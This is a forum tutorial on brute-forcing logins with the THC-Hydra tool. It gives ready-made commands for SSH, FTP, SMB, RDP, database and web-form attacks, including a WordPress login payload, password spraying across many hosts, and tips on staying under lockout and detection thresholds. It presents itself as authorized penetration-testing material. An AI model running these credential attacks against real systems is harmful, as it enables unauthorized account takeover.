• Blackhat Pakistan — Ethical Hacking, Hacking Tools & Cybersecurity Tutorials

Hydra Brute Force Tutorial 2026 - SSH, FTP and Web Form Attacks

Blackhatpakistan

Administrator
Staff member
Joined
Dec 30, 2024
Messages
388
Reaction score
206
Points
62
Website
blackhatpakistan.net
Points
1,068
USD
1,068
A Hydra brute force tutorial covers the online password attack workflow: THC-Hydra is the standard parallel login cracker that throws username-password combinations at running services - SSH, FTP, HTTP forms, SMB, RDP, databases - faster than any hand-rolled script, with a modular protocol engine that makes "add a target service" a flag change instead of a rewrite. This tutorial runs the real commands: service syntax, wordlist selection, the http-post-form attack against web logins, tuning threads so you do not lock the account, and the output format that drops straight into your engagement notes.

TL;DR - The shape of every Hydra run is the same: hydra -L users.txt -P pass.txt TARGET SERVICE plus service-specific options. Keep -t at 4 or lower for anything that locks accounts, always pass -f to stop at the first valid pair, and save everything with -o. SSH and FTP are one-flag services; web forms need the http-post-form path with the failure string that marks a bad login. Speed lives in GPU hashcat for offline hashes - Hydra is for services that answer you in real time.

INSTALL

Kali ships it:

Code:
sudo apt install hydra
hydra -h

From source:

Code:
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra && ./configure && make -j4

CORE SYNTAX

Code:
hydra -L users.txt -P pass.txt ssh://10.10.10.5            list x list, SSH
hydra -l admin -P pass.txt ftp://10.10.10.5                 single user, FTP
hydra -C creds.txt ssh://10.10.10.5                        user:pass combos file
hydra -l root -p admin123 TARGET                           one pair, any service

The option letters matter more than anything else:

Code:
-l USER        single username          -L FILE     username list
-p PASS         single password          -P FILE     password list
-C FILE         creds as user:pass per line (fastest when pairs are known)
-f              stop at first success (per target)
-F              stop when ANY pair works (whole run)
-t 4            tasks per target (default 16 - too loud for most services)
-vV             verbose, shows every attempt pair
-o FILE         write found creds to file
-M FILE         targets from file, one per line

SSH - THE DAILY CASE

Code:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -f -o hydra_ssh.out ssh://10.10.10.5

Against an engaged target: -t 4, -f, and a stop-on-first. Higher task counts on SSH just trigger fail2ban and burn the IP. If the username is known, drop -L for -l and Hydra skips the username loop entirely - measurably faster on rockyou-scale lists.

FTP AND SMB

Code:
hydra -L users.txt -P pass.txt -t 4 -f ftp://10.10.10.5
hydra -L users.txt -P pass.txt smb://10.10.10.5           SMBv1/2 login test
hydra -l administrator -P pass.txt rdp://10.10.10.5       RDP, keep -t low

FTP allows anonymous access? Skip Hydra and test it first - anonymous:anonymous sometimes answers before any wordlist work matters.

HTTP FORMS - THE ONE THAT NEEDS CARE

Generic form syntax:

Code:
hydra -L users.txt -P pass.txt TARGET http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid password:T=Welcome"

Three parts, colon-separated:

- The POST path and body with ^USER^ and ^PASS^ placeholders
- F= - the string that appears on FAILED login (Hydra skips when it sees it)
- T= - the string that appears on SUCCESS (Hydra reports the hit)

Find the failure string by logging in manually with browser devtools: wrong password, copy the exact response text. Common variants: "Invalid credentials", "Login failed", "incorrect password".

Real-world example against a WordPress login:

Code:
hydra -L users.txt -P pass.txt TARGET http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=is incorrect:T=wordpress_logged_in"

The testcookie=1 and wp-submit fields matter - WordPress rejects incomplete POST bodies before it even checks credentials, and Hydra would report every pair as failed.

GET-parameter logins (less common):

Code:
hydra -l admin -p pass.txt TARGET http-get "/admin.php?user=^USER^&pass=^PASS^:F=denied:T=panel"

DATABASES AND MIDDLEWARE

Code:
hydra -l root -P pass.txt mysql://10.10.10.5              MySQL
hydra -l sa -P pass.txt mssql://10.10.10.5                  MSSQL
hydra -l postgres -P pass.txt postgres://10.10.10.5         PostgreSQL
hydra -l admin -P pass.txt telnet://10.10.10.5              telnet, legacy gear
hydra -L users.txt -P pass.txt pop3s://mail.target.com      mail, SSL variant works too

Only database ports exposed to you are in scope - internal-only services need a foothold first (the web tier from sqlmap, for example).

TUNING - DO NOT BURN THE ACCOUNT

Code:
hydra ... -t 4                     4 parallel tasks, the polite default
hydra ... -w 5                      5 second wait between attempts (slowest, safest)
hydra ... -f                       stop at first hit per target
hydra ... -x 6:6:1                 generate passwords: 6 length min=max, 1 charset (aA1)
hydra -I                           ignore nmap-style restore, fresh run
hydra ... -V                      show every attempt, pair-level log

Lockout math: if the service locks after 5 failed attempts, no Hydra tuning saves you - you need a credential pair first (spray one password per account instead of ten against one). Offline cracking with hashcat and rockyou belongs on captured hashes, not on live services.

TARGET LISTS AND BATCH RUNS

Code:
hydra -L users.txt -P pass.txt -M hosts.txt -t 4 -f ssh      many hosts, one run
hydra -C combo.txt -M hosts.txt -t 4 smb                       known pairs, many hosts

M-file format: one host per line (or host:port for mixed ports). Keep -M runs small on shared infrastructure - a forty-host spray from one IP is a SOC ticket, not a pentest.

READING THE OUTPUT

Code:
[22][ssh] host: 10.10.10.5   login: root   password: admin123
1 of 1 target successfully completed, 1 valid password found

-save it: -o hydra_results.txt writes a clean credential block for the report, and grep "login:" on verbose output extracts hits from long runs:

Code:
grep "login:" hydra_out.txt | tee found_creds.txt

HYDRA VS HASHCAT VS MEDUSA

Code:
Tool     Speed model              Use when
-----    -----------------------   ------------------------------------
Hydra    live service, network     the service answers logins in real time
Medusa  parallel modules, cleaner log   large host lists, module variety
Hashcat  GPU, offline, millions/s  you already have the hash

Hashcat on a captured NTLM or bcrypt hash out-cracks Hydra by orders of magnitude - Hydra exists for the moment when there is no hash, only a login prompt.

FAQ

Q: Why does Hydra show "all passwords done" but no hit when I know a password works?
A: Wrong failure/success strings in http-post-form, or the form needs extra fields (WordPress testcookie is the usual culprit). Capture one real failed login in devtools and copy its body exactly.

Q: Is Hydra legal?
A: Against systems you own or hold written authorization to test - yes, standard pentest tooling. The authorization defines the line, same as every other tool in this series.

Q: What -t value is safe?
A: 4 for SSH/RDP/anything with lockout policies, 16 acceptable on lab FTP or internal services without rate limits. When unsure, 4 plus -f.

Q: Hydra says protocol check failed?
A: The port is wrong for the module, TLS is in play (use ftps://, pop3s://, https:// variants), or the service banner is unusual - confirm with nmap -sV what is actually speaking on that port.

RELATED ON BLACKHAT PAKISTAN

Linux Privilege Escalation Checklist 2026 - creds in hand, now what the box gives back.
SQLMap Tutorial for Beginners 2026 - the other route to credentials: out of the database instead of through the login prompt.
Kali Linux Tools List 2026 - Hydra in the full password-attacks stack with john and hashcat.
Nmap Cheat Sheet 2026 - finding the 22/21/25/445 ports that are worth a Hydra run at all.

Code:
hydra -L u.txt -P p.txt -t 4 -f ssh://HOST        SSH
hydra -L u.txt -P p.txt -t 4 -f ftp://HOST         FTP
hydra -l admin -P p.txt http-post-form "/login:u=^USER^&p=^PASS^:F=fail:T=ok"   web form
hydra -C combo.txt -M hosts.txt -t 4 smb            known pairs, many hosts
hydra -l root -p pass mysql://HOST                 database
hydra -o out.txt ...                               always save output
grep "login:" out.txt                              extract hits for report
 
Threads
1,073Threads
Messages
2,132Messages
Members
3,704Members
Latest member
AlaricalaraLatest member
Top